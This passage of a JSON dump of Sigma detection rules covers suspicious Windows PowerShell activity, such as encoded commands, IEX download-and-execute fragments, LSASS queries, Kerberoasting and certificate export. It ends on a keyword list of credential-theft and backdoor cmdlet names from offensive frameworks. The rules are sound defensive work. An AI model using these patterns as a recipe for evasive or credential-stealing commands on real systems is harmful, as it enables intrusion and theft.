selection_*\nfalsepositives:\n    - Legitimate usage of the features listed in the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_encode.yml",
    "content": "title: Suspicious Execution of Powershell with Base64\nid: fb843269-508c-4b76-8b8d-88679db22ce7\nstatus: test\ndescription: Commandline to launch powershell with a base64 payload\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets\n    - https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\n    - https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/\nauthor: frack113\ndate: 2022-01-02\nmodified: 2023-01-05\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - \\powershell.exe\n            - \\pwsh.exe\n        CommandLine|contains:\n            - ' -e '\n            - ' -en '\n            - ' -enc '\n            - ' -enco'\n            - ' -ec '\n    filter_encoding:\n        CommandLine|contains: ' -Encoding '\n    filter_azure:\n        ParentImage|contains:\n            - 'C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\'\n            - '\\gc_worker.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_encoding_patterns.yml",
    "content": "title: Potential Encoded PowerShell Patterns In CommandLine\nid: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f\nrelated:\n    - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6\n      type: similar\nstatus: test\ndescription: Detects specific combinations of encoding methods in PowerShell via the commandline\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65\nauthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton\ndate: 2020-10-11\nmodified: 2023-01-26\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_to_1:\n        CommandLine|contains:\n            - 'ToInt'\n            - 'ToDecimal'\n            - 'ToByte'\n            - 'ToUint'\n            - 'ToSingle'\n            - 'ToSByte'\n    selection_to_2:\n        CommandLine|contains:\n            - 'ToChar'\n            - 'ToString'\n            - 'String'\n    selection_gen_1:\n        CommandLine|contains|all:\n            - 'char'\n            - 'join'\n    selection_gen_2:\n        CommandLine|contains|all:\n            - 'split'\n            - 'join'\n    condition: selection_img and (all of selection_to_* or 1 of selection_gen_*)\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_exec_data_file.yml",
    "content": "title: Powershell Inline Execution From A File\nid: ee218c12-627a-4d27-9e30-d6fb2fe22ed2\nstatus: test\ndescription: Detects inline execution of PowerShell code from a file\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50\nauthor: frack113\ndate: 2022-12-25\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_exec:\n        CommandLine|contains:\n            - 'iex '\n            - 'Invoke-Expression '\n            - 'Invoke-Command '\n            - 'icm '\n    selection_read:\n        CommandLine|contains:\n            - 'cat '\n            - 'get-content '\n            - 'type '\n    selection_raw:\n        CommandLine|contains: ' -raw'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_export_certificate.yml",
    "content": "title: Certificate Exported Via PowerShell\nid: 9e716b33-63b2-46da-86a4-bd3c3b9b5dfb\nrelated:\n    - id: aa7a3fce-bef5-4311-9cc1-5f04bb8c308c\n      type: similar\nstatus: test\ndescription: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.\nreferences:\n    - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a\n    - https://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps\n    - https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-18\ntags:\n    - attack.credential-access\n    - attack.execution\n    - attack.t1552.004\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'Export-PfxCertificate '\n            - 'Export-Certificate '\n    condition: selection\nfalsepositives:\n    - Legitimate certificate exports by administrators. Additional filters might be required.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml",
    "content": "title: Base64 Encoded PowerShell Command Detected\nid: e32d4572-9826-4738-b651-95fa63747e8a\nstatus: test\ndescription: Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string\nreferences:\n    - https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-01-29\nmodified: 2023-01-26\ntags:\n    - attack.t1027\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1140\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '::FromBase64String('\n    condition: selection\nfalsepositives:\n    - Administrative script libraries\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_frombase64string_archive.yml",
    "content": "title: Suspicious FromBase64String Usage On Gzip Archive - Process Creation\nid: d75d6b6b-adb9-48f7-824b-ac2e786efe1f\nrelated:\n    - id: df69cb1d-b891-4cd9-90c7-d617d90100ce\n      type: similar\nstatus: test\ndescription: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43\nauthor: frack113\ndate: 2022-12-23\ntags:\n    - attack.command-and-control\n    - attack.t1132.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'FromBase64String'\n            - 'MemoryStream'\n            - 'H4sI'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml",
    "content": "title: PowerShell Get-Clipboard Cmdlet Via CLI\nid: b9aeac14-2ffd-4ad3-b967-1354a4e628c3\nrelated:\n    - id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78\n      type: derived\nstatus: test\ndescription: Detects usage of the 'Get-Clipboard' cmdlet via CLI\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/16\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-05-02\nmodified: 2022-12-25\ntags:\n    - attack.collection\n    - attack.t1115\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'Get-Clipboard'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml",
    "content": "title: Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet\nid: c8a180d6-47a3-4345-a609-53f9c3d834fc\nrelated:\n    - id: cef24b90-dddc-4ae1-a09a-8764872f69fc\n      type: similar\nstatus: test\ndescription: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet\nreferences:\n    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-10\ntags:\n    - attack.discovery\n    - attack.t1087.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Covers group and localgroup flags\n    selection_cmdlet:\n        CommandLine|contains: 'Get-LocalGroupMember '\n    selection_group:\n        CommandLine|contains:\n            # Add more groups for other languages\n            - 'domain admins'\n            - ' administrator' # Typo without an 'S' so we catch both\n            - ' administrateur' # Typo without an 'S' so we catch both\n            - 'enterprise admins'\n            - 'Exchange Trusted Subsystem'\n            - 'Remote Desktop Users'\n            - 'Utilisateurs du Bureau à distance' # French for \"Remote Desktop Users\"\n            - 'Usuarios de escritorio remoto' # Spanish for \"Remote Desktop Users\"\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_getprocess_lsass.yml",
    "content": "title: PowerShell Get-Process LSASS\nid: b2815d0d-7481-4bf0-9b6c-a4c48a94b349\nstatus: test\ndescription: Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity\nreferences:\n    - https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-04-23\nmodified: 2023-01-05\ntags:\n    - attack.credential-access\n    - attack.t1552.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # You can add more permutation as you see fit\n            - 'Get-Process lsas'\n            - 'ps lsas'\n            - 'gps lsas'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml",
    "content": "title: Abuse of Service Permissions to Hide Services Via Set-Service\nid: 514e4c3a-c77d-4cde-a00f-046425e2301e\nrelated:\n    - id: a537cfc3-4297-4789-92b5-345bfd845ad0\n      type: derived\n    - id: 953945c5-22fe-4a92-9f8a-a9edc1e522da\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)\nreferences:\n    - https://twitter.com/Alh4zr3d/status/1580925761996828672\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\pwsh.exe'\n        - OriginalFileName: 'pwsh.dll'\n    selection_sddl:\n        # Example would be: \"D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)\"\n        CommandLine|contains|all:\n            - 'Set-Service '\n            - 'DCLCWPDTSD'\n    selection_cmdlet:\n        CommandLine|contains:\n            - '-SecurityDescriptorSddl '\n            - '-sd '\n    condition: all of selection_*\nfalsepositives:\n    - Rare intended use of hidden services\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_iex_patterns.yml",
    "content": "title: Suspicious PowerShell IEX Execution Patterns\nid: 09576804-7a05-458e-a817-eb718ca91f54\nstatus: test\ndescription: Detects suspicious ways to run Invoke-Execution using IEX alias\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2\n    - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-03-24\nmodified: 2022-11-28\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_combined_1:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - ' | iex;'\n            - ' | iex '\n            - ' | iex}'\n            - ' | IEX ;'\n            - ' | IEX -Error'\n            - ' | IEX (new'\n            - ');IEX '\n    selection_combined_2:\n        CommandLine|contains:\n            - '::FromBase64String'\n            - '.GetString([System.Convert]::'\n    selection_standalone:\n        CommandLine|contains:\n            - ')|iex;$'\n            - ');iex($'\n            - ');iex $'\n            - ' | IEX | '\n            - ' | iex\\\"'\n    condition: all of selection_combined_* or selection_standalone\nfalsepositives:\n    - Legitimate scripts that use IEX\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml",
    "content": "title: Root Certificate Installed From Susp Locations\nid: 5f6a601c-2ecb-498b-9c33-660362323afa\nstatus: test\ndescription: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\nreferences:\n    - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/\n    - https://learn.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-09\nmodified: 2023-01-16\ntags:\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'Import-Certificate'\n            - ' -FilePath '\n            - 'Cert:\\LocalMachine\\Root'\n        CommandLine|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - ':\\Windows\\TEMP\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Perflogs\\'\n            - ':\\Users\\Public\\'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml",
    "content": "title: Import PowerShell Modules From Suspicious Directories - ProcCreation\nid: c31364f7-8be6-4b77-8483-dd2b5a7b69a3\nrelated:\n    - id: 21f9162c-5f5d-4b01-89a8-b705bd7d10ab\n      type: similar\nstatus: test\ndescription: Detects powershell scripts that import modules from suspicious directories\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-10\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'Import-Module \"$Env:Temp\\'\n            - Import-Module '$Env:Temp\\\n            - 'Import-Module $Env:Temp\\'\n            - 'Import-Module \"$Env:Appdata\\'\n            - Import-Module '$Env:Appdata\\\n            - 'Import-Module $Env:Appdata\\'\n            - 'Import-Module C:\\Users\\Public\\'\n            # Import-Module alias is \"ipmo\"\n            - 'ipmo \"$Env:Temp\\'\n            - ipmo '$Env:Temp\\\n            - 'ipmo $Env:Temp\\'\n            - 'ipmo \"$Env:Appdata\\'\n            - ipmo '$Env:Appdata\\\n            - 'ipmo $Env:Appdata\\'\n            - 'ipmo C:\\Users\\Public\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml",
    "content": "title: Unsigned AppX Installation Attempt Using Add-AppxPackage\nid: 37651c2a-42cd-4a69-ae0d-22a4349aa04a\nrelated:\n    - id: 975b2262-9a49-439d-92a6-0709cccdf0b2\n      type: similar\n    - id: 9a025188-6f2d-42f8-bb2f-d3a83d24a5af\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages\nreferences:\n    - https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package\n    - https://twitter.com/WindowsDocs/status/1620078135080325122\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-31\ntags:\n    - attack.persistence\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cmdlet:\n        CommandLine|contains:\n            - 'Add-AppPackage '\n            - 'Add-AppxPackage '\n    selection_flag:\n        CommandLine|contains: ' -AllowUnsigned'\n    condition: all of selection_*\nfalsepositives:\n    - Installation of unsigned packages for testing purposes\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_invocation_specific.yml",
    "content": "title: Suspicious PowerShell Invocations - Specific - ProcessCreation\nid: 536e2947-3729-478c-9903-745aaffe60d2\nrelated:\n    - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c\n      type: obsolete\n    - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71\n      type: similar\n    - id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090\n      type: similar\nstatus: test\ndescription: Detects suspicious PowerShell invocation command parameters\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-05\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_convert_b64:\n        CommandLine|contains|all:\n            - '-nop'\n            - ' -w '\n            - 'hidden'\n            - ' -c '\n            - '[Convert]::FromBase64String'\n    selection_iex:\n        CommandLine|contains|all:\n            - ' -w '\n            - 'hidden'\n            - '-noni'\n            - '-nop'\n            - ' -c '\n            - 'iex'\n            - 'New-Object'\n    selection_enc:\n        CommandLine|contains|all:\n            - ' -w '\n            - 'hidden'\n            - '-ep'\n            - 'bypass'\n            - '-Enc'\n    selection_reg:\n        CommandLine|contains|all:\n            - 'powershell'\n            - 'reg'\n            - 'add'\n            - '\\software\\'\n    selection_webclient:\n        CommandLine|contains|all:\n            - 'bypass'\n            - '-noprofile'\n            - '-windowstyle'\n            - 'hidden'\n            - 'new-object'\n            - 'system.net.webclient'\n            - '.download'\n    selection_iex_webclient:\n        CommandLine|contains|all:\n            - 'iex'\n            - 'New-Object'\n            - 'Net.WebClient'\n            - '.Download'\n    filter_chocolatey:\n        CommandLine|contains:\n            - \"(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1\"\n    
        - 'Write-ChocolateyWarning'\n    condition: 1 of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml",
    "content": "title: Suspicious Invoke-WebRequest Execution With DirectIP\nid: 1edff897-9146-48d2-9066-52e8d8f80a2f\nstatus: test\ndescription: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access\nreferences:\n    - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-21\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'powershell_ise.EXE'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_commands:\n        CommandLine|contains:\n            # These are all aliases of Invoke-WebRequest\n            - 'curl '\n            - 'Invoke-RestMethod'\n            - 'Invoke-WebRequest'\n            - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring\n            - 'iwr '\n            - 'wget '\n    selection_ip:\n        # In case of FP with local IPs add additional filters\n        CommandLine|contains:\n            - '://1'\n            - '://2'\n            - '://3'\n            - '://4'\n            - '://5'\n            - '://6'\n            - '://7'\n            - '://8'\n            - '://9'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml",
    "content": "title: Suspicious Invoke-WebRequest Execution\nid: 5e3cc4d8-3e68-43db-8656-eaaeefdec9cc\nrelated:\n    - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468\n      type: derived\nstatus: test\ndescription: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location\nreferences:\n    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-02\nmodified: 2025-07-18\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'powershell_ise.EXE'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_commands:\n        CommandLine|contains:\n            # These are all aliases of Invoke-WebRequest\n            - 'curl '\n            - 'Invoke-WebRequest'\n            - 'iwr '\n            - 'wget '\n    selection_flags:\n        CommandLine|contains:\n            - ' -ur'\n            - ' -o'\n    selection_susp_locations:\n        CommandLine|contains:\n            - '\\AppData\\'\n            - '\\Desktop\\'\n            - '\\Temp\\'\n            - '\\Users\\Public\\'\n            - '%AppData%'\n            - '%Public%'\n            - '%Temp%'\n            - '%tmp%'\n            - ':\\Windows\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_kerberos_kerberos_ticket_request_via_cli.yml",
    "content": "title: Suspicious Kerberos Ticket Request via CLI\nid: caa9a802-8bd8-4b9e-a5cd-4d6221670219\nrelated:\n    - id: a861d835-af37-4930-bcd6-5b178bfb54df\n      type: similar\nstatus: experimental\ndescription: |\n    Detects suspicious Kerberos ticket requests via command line using System.IdentityModel.Tokens.KerberosRequestorSecurityToken class.\n    Threat actors may use command line interfaces to request Kerberos tickets for service accounts in order to\n    perform offline password cracking attacks commonly known as Kerberoasting or other Kerberos ticket abuse\n    techniques like silver ticket attacks.\nreferences:\n    - https://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell\n    - https://learn.microsoft.com/en-us/dotnet/api/system.identitymodel.tokens.kerberosrequestorsecuritytoken?view=netframework-4.8.1\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-18\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'powershell.exe'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'System.IdentityModel.Tokens.KerberosRequestorSecurityToken'\n            - '.GetRequest()'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate command line usage by administrators or security tools.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_mailboxexport_share.yml",
    "content": "title: Suspicious PowerShell Mailbox Export to Share\nid: 889719ef-dd62-43df-86c3-768fb08dc7c0\nstatus: test\ndescription: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations\nreferences:\n    - https://youtu.be/5mqid-7zp8k?t=2481\n    - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html\n    - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1\n    - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-07\nmodified: 2022-10-26\ntags:\n    - attack.exfiltration\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'New-MailboxExportRequest'\n            - ' -Mailbox '\n            - ' -FilePath \\\\\\\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml",
    "content": "title: Malicious PowerShell Commandlets - ProcessCreation\nid: 02030f2f-6199-49ec-b258-ea71b07e03dc\nrelated:\n    - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n      type: derived\n    - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c\n      type: similar\nstatus: test\ndescription: Detects Commandlet names from well-known PowerShell exploitation frameworks\nreferences:\n    - https://adsecurity.org/?p=2921\n    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries\n    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1\n    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1\n    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1\n    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1\n    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec\n    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec\n    - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare\n    - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1\n    - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html\n    - https://github.com/HarmJ0y/DAMP\n    - https://github.com/samratashok/nishang\n    - https://github.com/DarkCoderSc/PowerRunAsSystem/\n    - https://github.com/besimorhino/powercat\n    - https://github.com/Kevin-Robertson/Powermad\n    - https://github.com/adrecon/ADRecon\n    - https://github.com/adrecon/AzureADRecon\n    - https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1\n    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/\n    - 
https://github.com/Arno0x/DNSExfiltrator/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-02\nmodified: 2025-12-10\ntags:\n    - attack.execution\n    - attack.discovery\n    - attack.t1482\n    - attack.t1087\n    - attack.t1087.001\n    - attack.t1087.002\n    - attack.t1069.001\n    - attack.t1069.002\n    - attack.t1069\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Note: Please ensure alphabetical order when adding new entries\n        CommandLine|contains:\n            - 'Add-Exfiltration'\n            - 'Add-Persistence'\n            - 'Add-RegBackdoor'\n            - 'Add-RemoteRegBackdoor'\n            - 'Add-ScrnSaveBackdoor'\n            - 'Check-VM'\n            - 'ConvertTo-Rc4ByteStream'\n            - 'Decrypt-Hash'\n            - 'Disable-ADIDNSNode'\n            - 'Disable-MachineAccount'\n            - 'Do-Exfiltration'\n            - 'Enable-ADIDNSNode'\n            - 'Enable-MachineAccount'\n            - 'Enabled-DuplicateToken'\n            - 'Exploit-Jboss'\n            - 'Export-ADR'\n            - 'Export-ADRCSV'\n            - 'Export-ADRExcel'\n            - 'Export-ADRHTML'\n            - 'Export-ADRJSON'\n            - 'Export-ADRXML'\n            - 'Find-Fruit'\n            - 'Find-GPOLocation'\n            - 'Find-TrustedDocuments'\n            - 'Get-ADIDNS' # Covers: Get-ADIDNSNodeAttribute, Get-ADIDNSNodeOwner, Get-ADIDNSNodeTombstoned, Get-ADIDNSPermission, Get-ADIDNSZone\n            - 'Get-ApplicationHost'\n            - 'Get-ChromeDump'\n            - 'Get-ClipboardContents'\n            - 'Get-FoxDump'\n            - 'Get-GPPPassword'\n            - 'Get-IndexedItem'\n            - 'Get-KerberosAESKey'\n            - 'Get-Keystrokes'\n            - 'Get-LSASecret'\n            - 'Get-MachineAccountAttribute'\n            - 'Get-MachineAccountCreator'\n            - 'Get-PassHashes'\n            - 'Get-RegAlwaysInstallElevated'\n 
